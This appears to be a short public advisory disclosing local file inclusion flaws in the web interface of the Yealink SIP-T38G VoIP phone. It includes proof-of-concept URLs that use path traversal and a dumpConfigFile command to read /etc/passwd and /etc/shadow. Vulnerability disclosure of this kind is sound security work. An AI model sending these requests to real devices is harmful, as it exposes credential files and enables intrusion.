Title: Yealink VoIP Phone SIP-T38G Local File InclusionAuthor: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 TeamVendor Homepage: http://www.yealink.com/Companyprofile.aspxVersion: VoIP Phone SIP-T38GCVE: CVE-2013-5756, CVE-2013-5757Description:Web interface contain a vulnerability that allow any page to be included.We are able to disclose /etc/passwd & /etc/shadowPOC:Using the page parameter (CVE-2013-5756):http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdhttp://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadowUsing the command parameter (CVE-2013-5757):http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")*By viewing the shadow file we are able to conclude that cgiServer.exx rununder the root privileges. This lead to CVE-2013-5759.
Post a Comment
EmoticonClick to see the code!
To insert emoticon you must added at least one space before the code.